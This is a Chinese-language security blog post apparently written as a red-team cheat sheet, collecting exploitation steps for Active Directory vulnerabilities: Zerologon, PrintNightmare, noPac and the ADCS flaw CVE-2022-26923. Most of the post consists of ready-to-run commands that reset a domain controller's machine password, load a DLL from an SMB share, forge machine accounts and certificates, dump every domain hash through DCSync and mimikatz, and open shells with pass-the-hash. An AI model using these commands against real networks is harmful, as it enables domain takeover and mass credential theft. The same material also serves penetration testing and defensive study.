<!DOCTYPE html><html lang="zh"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title>域内漏洞整理 | Hurn's Blog</title><meta name="description" content="域内漏洞整理 - Hurn"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.png"><link rel="stylesheet" href="/css/theme.css"><link rel="search" type="application/opensearchdescription+xml" href="/atom.xml" title="Hurn's Blog"><meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism.css" type="text/css"></head><body><div class="wrap"><header><h1 class="branding"><a href="/" title="Hurn's Blog"><img class="logo-image" src="/logo.png" alt="logo"></a></h1><ul class="nav nav-list"><li class="nav-list-item"><a class="nav-list-link" href="/" target="_self">HOME</a></li><li class="nav-list-item"><a class="nav-list-link" href="/archives" target="_self">ARCHIVES</a></li><li class="nav-list-item"><a class="nav-list-link" href="https://github.com/Dreyer" target="_blank">GITHUB</a></li><li class="nav-list-item"><a class="nav-list-link" href="/atom.xml" target="_self">RSS</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">域内漏洞整理</h1><div class="post-info"><a></a>2022-06-11</div><div class="post-content"><p>整理几个域内常见的漏洞</p>
<h1 id="0x1-MS17-010"><a href="#0x1-MS17-010" class="headerlink" title="0x1. MS17-010"></a>0x1. MS17-010</h1><p><a target="_blank" rel="noopener" href="https://github.com/worawit/MS17-010">https://github.com/worawit/MS17-010</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/worawit/MS17-010">https://github.com/worawit/MS17-010</a></p>
<h1 id="0x2-zerologon"><a href="#0x2-zerologon" class="headerlink" title="0x2. zerologon"></a>0x2. zerologon</h1><p>CVE-2020-1472, 也叫zerologon，该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷，导致攻击者可以在没有凭证的情况情况下通过认证。该漏洞的最稳定利用是调用netlogon中RPC函数NetrServerPasswordSet2来重置域控的密码（域控机器账户的密码，以$结尾），从而以域控的身份进行Dcsync获取域管权限。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/dirkjanm/CVE-2020-1472">https://github.com/dirkjanm/CVE-2020-1472</a></p>
<p>利用</p>
<pre><code class="shell"># 这一步会把域控DC2016(即DC2016\$用户)的密码置为空，即hash为31d6cfe0d16ae931b73c59d7e0c089c0
python cve-2020-1472-exploit.py DC2016 192.168.110.16

# 使用impacket套件里面的secretsdump来进行Dcsync。
python secretsdump.py   test.local/DC2016\$@DC2016    -dc-ip  192.168.110.16   -just-dc-user test\\administrator -hashes 31d6cfe0d16ae931b73c59d7e0c089c0:31d6cfe0d16ae931b73c59d7e0c089c0

# 解出域控上的机器Hash

# 恢复脱域的域控
python wmiexec.py test.local/administrator@192.168.110.16 -hashes aad3b435b1404eeaad3b535b51404ee:4f7421138deF943795f79d758fff

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

python restorepassword.py testsegment/s2016dc@s2016dc -target-ip 192.168.222.113 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3...etc


</code></pre>
<h1 id="0x3-PrintNightmare"><a href="#0x3-PrintNightmare" class="headerlink" title="0x3. PrintNightmare"></a>0x3. PrintNightmare</h1><p>CVE-2021-1675，也称PrintNightmare ， 在加载驱动前的校验可以被绕过，具体分析：<a target="_blank" rel="noopener" href="https://paper.seebug.org/1632/">https://paper.seebug.org/1632/</a></p>
<p>前提，需要一个普通的域账户，一个可访问的smb</p>
<p><a target="_blank" rel="noopener" href="https://github.com/cube0x0/CVE-2021-1675">https://github.com/cube0x0/CVE-2021-1675</a></p>
<pre><code class="shell">pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 &#39;\\192.168.1.215\smb\addCube.dll&#39;
</code></pre>
<pre><code class="poc">rpcdump.py @192.168.1.10 | egrep &#39;MS-RPRN|MS-PAR&#39;

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol
</code></pre>
<h1 id="0x4-nopac"><a href="#0x4-nopac" class="headerlink" title="0x4. nopac"></a>0x4. nopac</h1><p>CVE-2021-42278 + CVE-2021-42287 ，也就是nopac</p>
<p>CVE-2021-42278，机器用户应当是computer$的形式，但是实际并没有验证机器账号是否有$。导致机器用户名可以被模拟冒用。</p>
<p>CVE-2021-42287，使用computer的TGT通过另一个用户去请求computer自己的ST时，将TGT发送给KDC后，当KDC找不到computer。KDC会再次寻找computer$的ST，从而获得了computer$的ST。从而获得了computer$的权限。</p>
<pre><code class="shell"># 使用指定的用户密码扫描域内是否存在能利用该漏洞的DC
noPac.exe scan -domain exploit.local -user &quot;lowpriv&quot; -pass &quot;1qaz@WSX&quot;

# 使用一键化工具获得域控cifs的权限
noPac.exe -domain exploit.local -user &quot;lowpriv&quot; -pass &quot;1qaz@WSX&quot; /dc WIN-HHPV37PB123.exploit.local /mAccount demo6 /mPassword 1qaz@WSX /service cifs /ptt

# 使用一键化工具获得域控ldap服务的权限，同样此处的impersonate和手动利用方式一致，需要该用户可用
noPac.exe -domain exploit.local -user &quot;lowpriv&quot; -pass &quot;1qaz@WSX&quot; /dc WIN-HHPV37PB123.exploit.local /mAccount demo7 /mPassword 1qaz@WSX /service ldap /ptt /impersonate Administrator

# 使用dcsync导出域内所有密码
mimikatz.exe &quot;lsadump::dcsync /domain:exploit.local /all&quot; &quot;exit&quot;
</code></pre>
<p>py版本：<a target="_blank" rel="noopener" href="https://github.com/Ridter/noPac">https://github.com/Ridter/noPac</a></p>
<p>GetST</p>
<pre><code>python noPac.py cgdomain.com/sanfeng:&#39;1qaz@WSX&#39; -dc-ip 10.211.55.203
</code></pre>
<p>Auto get shell</p>
<pre><code>python noPac.py cgdomain.com/sanfeng:&#39;1qaz@WSX&#39; -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 
</code></pre>
<p>Dump hash</p>
<pre><code>python noPac.py cgdomain.com/sanfeng:&#39;1qaz@WSX&#39; -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:&#39;1qaz@WSX&#39; -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt
</code></pre>
<h1 id="0x5-adcs"><a href="#0x5-adcs" class="headerlink" title="0x5. adcs"></a>0x5. adcs</h1><p>CVE-2022–26923, 由于计算机账户中的dNSHostName不具有唯一性，可以对其进行伪造，冒充高权限的域空机器账户，实现权限提升的效果</p>
<ol>
<li>powershell枚举CA名称</li>
</ol>
<pre><code class="shell"># 列出证书驱动器
powerpick Get-PSDrive cert | ft -AutoSize

# 列出本地机器账户的证书
powerpick Get-ChildItem Cert:\LocalMachine\Root\
</code></pre>
<ol start="2">
<li>创建机器账户</li>
</ol>
<pre><code class="shell"># 创建机器账户
python3 bloodyAD.py -d redteam.lab -u ken -p &#39;123.com&#39; --host 10.10.2.20 addComputer CPT01 &#39;Passw0rd&#39;

# 设置dNSHostName
python3 bloodyAD.py -d redteam.lab -u ken -p &#39;123.com&#39; --host 10.10.2.20 setAttribute &#39;CN=CPT01,CN=Computers,DC=redteam,DC=lab&#39; DNSHostName &#39;[&quot;DC2016.redteam.lab&quot;]&#39;
</code></pre>
<ol start="3">
<li>申请证书</li>
</ol>
<pre><code class="shell">certipy req &#39;redteam.lab/CPT01$:Passw0rd@DC2016.redteam.lab&#39; -ca &#39;redteam-DC2016-CA&#39; -template &#39;Machine&#39;
</code></pre>
<ol start="4">
<li>同样使用<a target="_blank" rel="noopener" href="https://github.com/ly4k/Certipy">Certipy</a>工具申请票据</li>
</ol>
<pre><code class="shel">certipy auth -pfx dc2016.pfx -username DC2016$ -domain redteam.lab -dc-ip 10.10.2.20
</code></pre>
<ol start="5">
<li>获取域控Hash</li>
</ol>
<pre><code class="shell">KRB5CCNAME=dc2016.ccache python3 secretsdump.py -k redteam.lab/DC2016\$@dc2016.redteam.lab -no-pass -just-dc
</code></pre>
<ol start="6">
<li>利用<ul>
<li>获取域控权权限</li>
</ul>
</li>
</ol>
<pre><code class="shell">python3 wmiexec.py -hashes :83a140d89e42046e8daf5394d386a69a redteam.lab/administrator@10.10.2.20 -dc-ip 10.10.2.20

python3 smbexec.py -hashes :83a140d89e42046e8daf5394d386a69a administrator@DC2016.redteam.lab -dc-ip 10.10.2.20
</code></pre>
<ul>
<li>申请域控CIFS票据访问</li>
</ul>
<pre><code class="shell"># 申请票据，保存为Admin.ccache
python3 gets4uticket.py kerberos+ccache://redteam.lab\\DC2016\$:dc2016.ccache@dc2016.redteam.lab cifs/dc2016.redteam.lab@redteam.lab Administrator@redteam.lab admin.ccache -v

# 使用票据登录
KRB5CCNAME=admin.ccache python3 smbexec.py -k redteam.lab/administrator@DC2016.redteam.lab -no-pass -dc-ip 10.10.2.20
</code></pre>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/333594.html">https://www.freebuf.com/vuls/333594.html</a></p>
</div></article></div></main><footer><div class="paginator"><a class="prev" href="/2022/06/12/%E9%9A%BE%E6%90%9E%E7%9A%84Defender/">prev</a><a class="next" href="/2022/06/11/%E5%86%85%E7%BD%91/%E5%87%AD%E8%AF%81%E5%AF%BC%E5%87%BA/">next</a></div><div class="copyright"><p>&copy; 2023 <a href="http://example.com">Hurn</a>.<br>Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/Dreyer/hexo-theme-artemis" target="_blank">Artemis</a>.</p></div></footer></div></body></html>